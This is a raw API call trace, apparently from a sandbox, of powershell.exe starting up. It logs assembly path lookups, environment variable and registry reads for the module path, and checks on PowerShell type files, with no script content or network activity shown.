	[0302.255] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0303.552] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0303.552] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0303.553] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0303.553] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0303.580] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0303.580] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0303.580] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0303.580] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0303.580] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0303.580] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d300, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0303.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0303.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0303.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0303.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0304.647] SetConsoleCtrlHandler (HandlerRoutine=0x29b68dc, Add=1) returned 1
	[0305.694] CoCreateGuid (in: pguid=0x28d9d0 | out: pguid=0x28d9d0*(Data1=0x6adab86e, Data2=0xe703, Data3=0x40f3, Data4=([0]=0xaa, [1]=0xbc, [2]=0xd6, [3]=0x8c, [4]=0xdf, [5]=0x63, [6]=0x93, [7]=0x37))) returned 0x0
	[0305.695] CoTaskMemAlloc (cb=0x104) returned 0xed3d0
	[0305.695] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed3d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0305.695] CoTaskMemFree (pv=0xed3d0) 
	[0305.700] WinSqmIsOptedIn () returned 0x0
	[0305.701] CoTaskMemAlloc (cb=0x104) returned 0xed3d0
	[0305.701] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed3d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0305.701] CoTaskMemFree (pv=0xed3d0) 
	[0305.705] CoTaskMemAlloc (cb=0x104) returned 0xed3d0
	[0305.705] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed3d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0305.705] CoTaskMemFree (pv=0xed3d0) 
	[0305.706] CoTaskMemAlloc (cb=0x104) returned 0xed3d0
	[0305.706] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed3d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0305.706] CoTaskMemFree (pv=0xed3d0) 
	[0305.707] CoTaskMemAlloc (cb=0x104) returned 0xed3d0
	[0305.707] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed3d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0305.707] CoTaskMemFree (pv=0xed3d0) 
	[0305.709] CoTaskMemAlloc (cb=0x104) returned 0xed3d0
	[0305.709] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed3d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0305.709] CoTaskMemFree (pv=0xed3d0) 
	[0305.711] CoTaskMemAlloc (cb=0x104) returned 0xed3d0
	[0305.711] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed3d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0305.711] CoTaskMemFree (pv=0xed3d0) 
	[0305.711] CoTaskMemAlloc (cb=0x104) returned 0xed3d0
	[0305.711] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed3d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0305.711] CoTaskMemFree (pv=0xed3d0) 
	[0305.711] CoTaskMemAlloc (cb=0x104) returned 0xed3d0
	[0305.711] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed3d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0305.712] CoTaskMemFree (pv=0xed3d0) 
	[0305.713] CoTaskMemAlloc (cb=0x104) returned 0xed3d0
	[0305.713] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed3d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0305.713] CoTaskMemFree (pv=0xed3d0) 
	[0305.716] CoTaskMemAlloc (cb=0x104) returned 0xed3d0
	[0305.716] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed3d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0305.716] CoTaskMemFree (pv=0xed3d0) 
	[0305.716] CoTaskMemAlloc (cb=0x104) returned 0xed3d0
	[0305.716] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed3d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0305.716] CoTaskMemFree (pv=0xed3d0) 
	[0305.716] CoTaskMemAlloc (cb=0x104) returned 0xed3d0
	[0305.716] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed3d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0305.716] CoTaskMemFree (pv=0xed3d0) 
	[0307.544] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28ce20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.544] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.544] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.544] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0308.979] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28ce20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0308.979] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0308.980] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0308.980] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28ce20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0308.980] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0308.981] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0308.981] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28ce20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0308.981] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0308.981] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0308.982] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28ce20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0308.982] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0308.982] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28cd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0308.985] CoTaskMemAlloc (cb=0x104) returned 0xed3d0
	[0308.985] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0xed3d0, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0308.985] CoTaskMemFree (pv=0xed3d0) 
	[0308.986] CoTaskMemAlloc (cb=0xcc) returned 0x1b7ec970
	[0308.986] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b7ec970, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0308.986] CoTaskMemFree (pv=0x1b7ec970) 
	[0308.986] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d548 | out: phkResult=0x28d548*=0x328) returned 0x0
	[0308.986] RegQueryValueExW (in: hKey=0x328, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x28d4cc, lpData=0x0, lpcbData=0x28d4c8*=0x0 | out: lpType=0x28d4cc*=0x2, lpData=0x0, lpcbData=0x28d4c8*=0x6c) returned 0x0
	[0308.987] CoTaskMemAlloc (cb=0x70) returned 0xf5290
	[0308.987] RegQueryValueExW (in: hKey=0x328, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x28d49c, lpData=0xf5290, lpcbData=0x28d498*=0x6c | out: lpType=0x28d49c*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x28d498*=0x6c) returned 0x0
	[0308.987] CoTaskMemFree (pv=0xf5290) 
	[0308.987] CoTaskMemAlloc (cb=0xcc) returned 0x1b7ec970
	[0308.987] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x1b7ec970, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0308.987] CoTaskMemFree (pv=0x1b7ec970) 
	[0308.987] CoTaskMemAlloc (cb=0xcc) returned 0x1b7ec970
	[0308.987] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b7ec970, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0308.987] CoTaskMemFree (pv=0x1b7ec970) 
	[0308.991] RegCloseKey (hKey=0x328) returned 0x0
	[0308.991] CoTaskMemAlloc (cb=0xcc) returned 0x1b7ec970
	[0308.991] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b7ec970, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0308.991] CoTaskMemFree (pv=0x1b7ec970) 
	[0308.991] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d548 | out: phkResult=0x28d548*=0x328) returned 0x0
	[0308.991] RegQueryValueExW (in: hKey=0x328, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x28d4cc, lpData=0x0, lpcbData=0x28d4c8*=0x0 | out: lpType=0x28d4cc*=0x0, lpData=0x0, lpcbData=0x28d4c8*=0x0) returned 0x2
	[0308.991] RegCloseKey (hKey=0x328) returned 0x0
	[0310.077] CoTaskMemAlloc (cb=0x20c) returned 0x148560
	[0310.078] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x148560 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0310.079] CoTaskMemFree (pv=0x148560) 
	[0310.079] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x28d0d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0310.080] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0310.091] CoTaskMemAlloc (cb=0x104) returned 0xed3d0
	[0310.091] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed3d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0310.091] CoTaskMemFree (pv=0xed3d0) 
	[0310.093] CoTaskMemAlloc (cb=0x104) returned 0xed3d0
	[0310.094] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed3d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0310.094] CoTaskMemFree (pv=0xed3d0) 
	[0310.098] CoTaskMemAlloc (cb=0x104) returned 0xed3d0
	[0310.098] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed3d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0310.098] CoTaskMemFree (pv=0xed3d0) 
	[0310.098] CoTaskMemAlloc (cb=0x104) returned 0xed3d0
	[0310.098] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed3d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0310.098] CoTaskMemFree (pv=0xed3d0) 
	[0310.647] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d338 | out: phkResult=0x28d338*=0x330) returned 0x0
	[0310.648] RegQueryValueExW (in: hKey=0x330, lpValueName="path", lpReserved=0x0, lpType=0x28d34c, lpData=0x0, lpcbData=0x28d348*=0x0 | out: lpType=0x28d34c*=0x1, lpData=0x0, lpcbData=0x28d348*=0x74) returned 0x0
	[0310.649] RegQueryValueExW (in: hKey=0x330, lpValueName="path", lpReserved=0x0, lpType=0x28d2bc, lpData=0x0, lpcbData=0x28d2b8*=0x0 | out: lpType=0x28d2bc*=0x1, lpData=0x0, lpcbData=0x28d2b8*=0x74) returned 0x0
	[0310.649] CoTaskMemAlloc (cb=0x78) returned 0xf5290
	[0310.649] RegQueryValueExW (in: hKey=0x330, lpValueName="path", lpReserved=0x0, lpType=0x28d28c, lpData=0xf5290, lpcbData=0x28d288*=0x74 | out: lpType=0x28d28c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x28d288*=0x74) returned 0x0
	[0310.650] CoTaskMemFree (pv=0xf5290) 
	[0310.650] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x28d000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0310.650] SetErrorMode (uMode=0x1) returned 0x1
	[0310.650] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x28d210 | out: lpFileInformation=0x28d210*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0310.650] SetErrorMode (uMode=0x1) returned 0x1
	[0310.651] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x28d000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0310.651] SetErrorMode (uMode=0x1) returned 0x1
	[0310.651] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28d210 | out: lpFileInformation=0x28d210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0310.651] SetErrorMode (uMode=0x1) returned 0x1
	[0310.653] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x28d000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0310.653] SetErrorMode (uMode=0x1) returned 0x1
	[0310.653] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x28d210 | out: lpFileInformation=0x28d210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0310.653] SetErrorMode (uMode=0x1) returned 0x1
	[0310.654] CoTaskMemAlloc (cb=0x104) returned 0xed3d0
	[0310.654] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed3d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0310.654] CoTaskMemFree (pv=0xed3d0) 
	[0310.655] CoTaskMemAlloc (cb=0x104) returned 0xed3d0
	[0310.655] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xed3d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0310.656] CoTaskMemFree (pv=0xed3d0) 
	[0310.656] GetACP () returned 0x4e4
